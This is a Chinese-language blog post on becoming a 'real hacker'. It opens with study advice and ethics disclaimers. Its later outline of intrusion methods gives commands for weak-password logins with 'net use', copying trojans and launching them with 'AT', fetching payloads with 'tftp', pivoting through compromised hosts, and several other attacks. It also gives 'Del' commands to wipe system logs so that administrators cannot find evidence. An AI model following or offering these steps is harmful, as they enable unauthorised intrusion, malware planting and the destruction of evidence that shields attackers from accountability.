如何成为一名真正的黑客

黑客之路,没有终点。

一、什么是黑客?——最初曾指热心于计算机技术、水平高超的电脑专家,尤其是程序设计人员,逐渐区分为白帽、灰帽、黑帽等,其中黑帽black hat实际就是cracker(骇客即破坏者);在这里强调一点的是,黑客不是骇客!

二、成为一名黑客之前,我们应该怎么做?

我觉得,首先应该脚踏实地,把电脑方面和成为一名黑客所需要的的基础知识打牢,然后再一步一个脚印地在问题的引领下,一点一点解决困难,慢慢获得知识和成就感。很多小白像我当初一样,发现黑客是一个炫酷又装逼的角色,于是三分热血上头,想一下子吃个胖子,可是没过几天就发现,原来自己什么也不是。在这里不是打击那些想成为黑客的朋友,我曾记得一名外国著名黑客曾说过这样一句话:“我从22岁就开始学习黑客技术了,今年已经45岁了,可直到现在我都不敢说自己是一个真正的黑客。”

三、如何成为一名黑客?

入门:2进制,16进制,计算机术语了解

第一步:学编程,C/C++,JAVA,汇编(这个一定要会,否则你不会明白什么叫缓冲溢出,也就不会2进制代码的分析),

第二步:TCP/IP三章要学得滚瓜烂熟。了解各种通信协议原理和技术,同时了解加密技术等等

第三步:学习操作系统原理,各种网络服务工作原理


一、学习技术:

互联网上的新技术一旦出现,黑客就必须立刻学习,并用最短的时间掌握这项技术,这里所说的掌握并不是一般的了解,而是阅读有关的“协议”(rfc)、深入了解此技术的机理,否则一旦停止学习,那么依靠他以前掌握的内容,并不能维持他的“黑客身份”超过一年。
     初级黑客要学习的知识是比较困难的,因为他们没有基础,所以学习起来要接触非常多的基本内容,然而今天的互联网给读者带来了很多的信息,这就 需要初级学习者进行选择:太深的内容可能会给学习带来困难;太“花哨”的内容又对学习黑客没有用处。所以初学者不能贪多,应该尽量寻找一本书和自己的完整 教材、循序渐进的进行学习。
二、伪装自己:
     黑客的一举一动都会被服务器记录下来,所以黑客必须伪装自己使得对方无法辨别其真实身份,这需要有熟练的技巧,用来伪装自己的IP地址、使用跳板逃避跟踪、清理记录扰乱对方线索、巧妙躲开防火墙等。
     伪装是需要非常过硬的基本功才能实现的,这对于初学者来说成的上“大成境界”了,也就是说初学者不可能用短时间学会伪装,所以我并不鼓励初学者利用自己学习的知识对网络进行攻击,否则一旦自己的行迹败露,最终害的害是自己。
     如果有朝一日你成为了真正的黑客,我也同样不赞成你对网络进行攻击,毕竟黑客的成长是一种学习,而不是一种犯罪。
三、发现漏洞:
     漏洞对黑客来说是最重要的信息,黑客要经常学习别人发现的漏洞,并努力自己寻找未知漏洞,并从海量的漏洞中寻找有价值的、可被利用的漏洞进行试验,当然他们最终的目的是通过漏洞进行破坏或着修补上这个漏洞。
     黑客对寻找漏洞的执著是常人难以想象的,他们的口号说“打破权威”,从一次又一次的黑客实践中,黑客也用自己的实际行动向世人印证了这一点–世界上没有“不存在漏洞”的程序。在黑客眼中,所谓的“天衣无缝”不过是“没有找到”而已。
四、利用漏洞:
     对于正派黑客来说,漏洞要被修补;对于邪派黑客来说,漏洞要用来搞破坏。而他们的基本前提是“利用漏洞”,黑客利用漏洞可以做下面的事情:
1、获得系统信息:有些漏洞可以泄漏系统信息,暴露敏感资料,从而进一步入侵系统;
2、入侵系统:通过漏洞进入系统内部,或取得服务器上的内部资料、或完全掌管服务器
3、寻找下一个目标:一个胜利意味着下一个目标的出现,黑客应该充分利用自己已经掌管的服务器作为工具,寻找并入侵下一个系统;
4、做一些好事:正派黑客在完成上面的工作后,就会修复漏洞或者通知系统管理员,做出一些维护网络安全的事情;
5、做一些坏事:邪派黑客在完成上面的工作后,会判断服务器是否还有利用价值。如果有利用价值,他们会在服务器上植入木马或者后门,便于下一次来访;而对没有利用价值的服务器他们决不留情,系统崩溃会让他们感到无限的快感!黑客应掌握的基本技能:从这一节开始,我们就真正踏上学习黑客的道路了,首先要介绍的是作为一名初级黑客所必须掌握的基本技能,学习这可以通过这一节的阅读了解到黑 客并不神秘,而且学习起来很容易上手。为了保证初学者对黑客的兴趣,所以本书采取了循环式进度,也就是说每一章节的内容都是独立、全面的,学习者只有完整 的学习过一章的内容,才能够进而学习下一章的内容。

一、了解一定量的英文:
     学习英文对于黑客来说非常重要,因为现在大多数资料和教程都是英文版本,而且有关黑客的新闻也是从国外过来的,一个漏洞从发现到出现中文介 绍,需要大约一个星期的时间,在这段时间内网络管理员就已经有足够的时间修补漏洞了,所以当我们看到中文介绍的时候,这个漏洞可能早就已经不存在了。因此 学习黑客从一开始就要尽量阅读英文资料、使用英文软件、并且及时关注国外著名的网络安全网站。
二、学会基本软件的使用:
     这里所说的基本软件是指两个内容:一个是我们日常使用的各种电脑常用命令,例如ftp、ping、net等;另一方面还要学会有关黑客工具的 使用,这主要包括端口扫描器漏洞扫描器、信息截获工具和密码破解工具等。因为这些软件品种多,功能各不相同,所以本书在后面将会介绍几款流行的软件使用 方法,学习者在掌握其基本原理以后,既可以选择适合自己的,也可以在“第二部分”中找到有关软件的开发指南,编写自己的黑客工具。
三、初步了解网络协议和工作原理:
     所谓“初步了解”就是“按照自己的理解方式”弄明白网络的工作原理,因为协议涉及的知识多且复杂,所以如果在一开始就进行深入研究,势必会大 大挫伤学习积极性。在这里我建议学习者初步了解有关tcp/ip协议,尤其是浏览网页的时候网络是如何传递信息、客户端浏览器如何申请“握手信息”、服务 器端如何“应答握手信息”并“接受请求”等内容,此部分内容将会在后面的章节中进行具体介绍。
四、熟悉几种流行的编程语言和脚本:
     同上面所述一样,这里也不要求学习者进行深入学习,只要能够看懂有关语言、知道程序执行结果就可以了。建议学习者初步学习C语言、asp和 cgi脚本语言,另外对于htm超文本语言和php、java等做基本了解,主要学习这些语言中的“变量”和“数组”部分,因为语言之间存在内在联系,所 以只要熟练掌握其中一们,其他语言也可以一脉相同,建议学习C语言和htm超文本语言。

五、熟悉网络应用程序:

网络应用程序包括各种服务器软件后台程序,例如:wuftp、Apache等服务器后台;还有网上流行的各种论坛、电子社区。有条件的学习者 最好将自己的电脑做成服务器,然后安装并运行一些论坛代码,经过一番尝试之后,将会感性的弄清楚网络工作原理,这比依靠理论学习要容易许多,能够达到事半 功倍的效果!

必须要掌握的几个命令

·Net

·netsh

·Ftp

·hostname

·

Telenet(nc)

·tracert

·At

·Tftp

·Netstat

·Regedit

·Ping

必须要掌握的几个协议

·http

·dns

·ftp

·Pop

·Smtp

·Icmp

·Udp

·tcp

开始

·掌握了黑客攻击的方式和手段后,那么学习黑客就简单多了!

·因为你掌握了这些,剩余的就是使用工具入侵

·熟悉掌握一套自己用的黑客工具

高级

·自己编写专用的黑客工具

·自己发现系统漏洞

黑客入侵手段

·收集信息:

·  收集要入侵的目标信息

·  IP,域名,端口,漏洞,位置

弱口令

·在nt\2000\xp\2003中弱口令可以用

·Net use \ip “password” /user:user

·如果目标机开3389服务,可以直接连接

·在sql的sa弱口令,可以用sql连接器直接 ·登陆

后门木马

·如果有ipc$共享,可以copy过去木马后门

·用at启动

·AT \ip time /INTERACTIVE

·如果可以得到shell,也可以用tftp

·Tftp.exe –i ip get *.* *.*

·然后直接安装 ·如果有3389,可以自己建一个iis,下载 直接运行

密码破解

·远程破解mysql,mssql,ftp,mail,共享密码

·本地破解管理员(administrator)密码

缓冲溢出

·可以用缓冲溢出攻击,

·比如流行的webdev,rdcom模块漏洞

·可以直接得到system管理权限

·缓冲溢出后的一般现象是:

·Microsoft Windows 2000 [Version 5.00.2195]

(C) Copyright 1985-2000 Microsoft Corp.

C:\WINNT\system32>

Web服务漏洞

·例如:

·Unicode漏洞遍历磁盘和执行程序

·二次编码漏洞遍历磁盘和执行程序

·.HTR漏洞查看源代码

嗅探监听

·例如:

·针对web监听

·针对mail监听

·工具如Tongue Tiedinffer , iris

欺骗攻击

·例如:

·运用arp欺骗攻击

伪装欺骗

·常见的如:mail病毒

·把一个文件改名字甚至图标,欺骗对方执行

社会工程学

·例如:

·QQ聊天*****

·EMAIL信息

·电话

·*****

拒绝服务

·例如:

·Dos攻击

·Ddos攻击

利用跳板

·利用自己的肉鸡作为跳板攻击别的机器

·My PC------>跳板(肉鸡)--->目标

路由器漏洞

·如:

·原始密码

·程序漏洞

防火墙

·利用欺骗攻击防火墙,导致防火墙功能失效

·利用防火墙的模块漏洞

unix/linux

·NetWare Linux unix solais Solaris hp-unix Aix 等

·这些目前先不讲解

精通黑客工具

·必须有一套自己可以完全掌握的黑客工具

·如端口扫描 Nscan,bluescanport

·监听工具Tongue Tiedinffer iris

·telnet工具:nc

·扫描工具Tongue Tiedss,nmap, LANguard

·后门工具:radmin,winshell

·密码破解:lc4

·远程管理Stick out tonguecanywhere

·会使用各种经典的黑客工具

清除日志

·在你入侵机器以后,离开的时候,要完全清除

·自己在那台机器上留下的痕迹

·例如清除

·Del C:\WINNT\system32\LogFiles\*.*

·Del C:\WINNT\system32\*.log

·Del C:\WINNT\system32\*.txt

·Del C:\WINNT\*.log

·Del c:\winnt\*.txt

如果你不清除日志

·当目标机器的管理员发现你的证据

·完全可以让你在大墙内渡过一段日子

黑客

·当你完全掌握这些后

·你就成为了一名小黑客

高级

·编写自己的黑客工具

·发现系统漏洞

高级黑客

·目前你足以成为一个高级黑客了

真正的黑客

·精通各种网络协议

·精通操作系统

·精通编程技术

·精通安全防护

·不搞破坏

·挑战技术难题

结束

·想学好这些,并不是靠别人给你的,而是靠自己的努力,自己的自学得到的!

·别人只能指导你,怎么去做,只能告诉方法,

·真正的实施是你自己,经过N*N个日夜努力换来的

·不要一个问题问多次,要多动手,动脑!

·Google里面有太多的答案,为什么我搜索不到?因为你的关键字用的不对!

时间: 2024-12-27 15:20:33

如何成为一名真正的黑客的相关文章

谷歌“信息安全公主”:我是一名好黑客

据国外媒体报道,信息安全界流传着这样一个段子.如果你想成为某大公司的首席信息安全工程师,那么你有两条路可走:第一条就是从名校毕业,然后从最基础的级别干起,每五年升一个职称,也许20年后你会成为这家公司的首席信息安全工程师:另外一条路就是直接黑了那家公司的系统,然后告诉他们的CEO这是你干的. 而今天介绍的主人公显然走的就是黑客洗白的道路.谷歌的“信息安全公主”帕里萨•塔布瑞兹(Parisa Tabriz)目前带领着超过30名工程师的团队,专门发现和处理谷歌Chrome浏览器的安全威胁.她和她的团

黑客白皮书:如何成为一名黑客(附FAQ)

内容一览 为什么会有这份文档? 什么是黑客? 黑客应有的态度 黑客的基本技能 黑客文化中的地位 黑客和书呆子(Nerd)的联系 风格的意义 其它资源 FAQ(常问问题解答) 作为Jargon File的编辑和一些其他有名的类似性质文章的作者,我经常收到充满热情的网络新手的email提问(确实如此) “我如何才能成为一名出色的黑客?”非常奇怪的是似乎没有任何的FAQ或者Web形式的文档来说明这个十分重要的问题,因此我写了一份. 如果你现在读的是这份文档的离线拷贝,那么请注意当前最新版本(英文版)在

如何成为一名黑客(How To Become A Hacker)

英文原文来自http://www.catb.org/~esr/faqs/hacker-howto.html,How To Become A Hacker,作者是埃里克·斯蒂芬·雷蒙(Eric Steven Raymond),著名的<Unix编程艺术>就出自他手,他的一句话对开源运动有很大影响--"足够多的眼睛,就可让所有问题浮现"(given enough eyeballs, all bugs are shallow),这句话也被称作林纳斯定律. 下面是译文部分. 为什么写

如何成为一名黑客

如何成为一名黑客 http://www.kerneltravel.net/jiqiao/hacker.html#AEN277 如何成为一名黑客 Copyright © 2001 by Eric S. Raymond 翻译:Barret 翻译水平有限,欢迎来信指教,我的Email是barret(a)ynmail.com, 但请勿问电脑技术问题(反正也不懂). 允许未经作者及译者的同意进行非商业目的的转载,但必须保持原文的完整性. 内容一览 为什么会有这份文档? 什么是黑客? 黑客应有的态度 黑客的

黑客讲述渗透Hacking Team全过程(详细解说)

近期,黑客Phineas Fisher在pastebin.com上讲述了入侵Hacking Team的过程,以下为其讲述的原文情况,文中附带有相关文档.工具及网站的链接,请在安全环境下进行打开,并合理合法使用.作者部分思想较为激进,也请以辩证的观点看待之. 1.序言 在这里,可能你会注意到相比于前面的一个版本,这个版本的内容及语言有了一些变化,因为这将是最后一个版本了[1].对于黑客技术,英语世界中已经有了许多书籍,讲座,指南以及关于黑客攻击的知识.在那个世界,有许多黑客比我优秀,但他们埋没了他

想学习黑客技术吗?告诉你什么才是真正的黑客!

科技发展至今,我们的生活.工作和学习已经离不开互联网.而互联网中必须面对的一个大问题就是安全.然后,就涌现出了一批人,他们掌握着超高的计算机技术,对互联网知识了如指掌,他们有可能会维护我们的网络安全,当然这些技术也有可能严重威胁这我们的网络安全,这类人,我们就称之为黑客! 黑客骇客和红客 掌握了高超的技术,但是把技术使用在什么方面,就是每个人的主观能动性控制的了.而根据高技术人群把技术使用方向,我们有将其分为黑客.骇客.红客. 黑客:黑客指精通操作系统和网络技术的人群,热衷于科技探索及极限技术的

历史上留下浓重一笔的黑客们

在互联网发展早期,黑客往往是一些因为兴趣而惹祸上身的天才少年,但随着互联网经济成为世界经济的重要一部分,让很多人对黑客产生了兴趣,因此今天很多黑客入侵电脑通常就是为了钱,而据一些专家表示,世界上一些顶级网络骗子每年收入可达一亿美元. 为此国外网站businessinsider罗列了十位让你生活可以立马变得苦不堪言的黑客,趁这次机会,就让我们一起看下那些年都有哪些黑客在历史上留下了浓重的一笔. 第一位:盗刷金额最大的黑客Albert Gonzalez 作为一名黑客,Albert Gonzalez在

SQL 注入,永不过时的黑客技术

TalkTalk的信息泄漏事件导致约15万人的敏感信息被暴露,涉嫌造成这一事件的其中一名黑客使用的并不是很新的技术.事实上,该技术的「年纪」比这名15岁黑客还要大两岁. [译注:TalkTalk是英国电话和宽带供应商,这件信息安全事故发生在2015年10月份,当时这件事情还挺轰动的,上了新闻头条,其中一名黑客年仅15岁.] 这项技术就是大名鼎鼎的SQL注入,所谓SQL注入就是黑客在网站的提交表单数据中输入恶意命令从而获取数据的方法.它曾经被用来窃取世界卫生组织员工的信息,偷过华尔街日报数据,甚至

Python 黑帽子:黑客与渗透测试编程之道——互动出版网

这篇是计算机类的优质预售推荐>>>><Python 黑帽子:黑客与渗透测试编程之道> 安全畅销书<Python灰帽子>同作者姊妹篇 知道创宇余弦.腾讯胡珀及Keen.蓝莲花等知名黑客战队联合作序盛赞 编辑推荐 本书适合有一定编程基础的安全爱好者.计算机从业人员阅读,特别是对正在学习计算机安全专业,立志从事计算机安全行业,成为渗透测试人员的人来说,这本书更是不可多得的参考. 内容简介 <Python 黑帽子:黑客与渗透测试编程之道>是畅销书<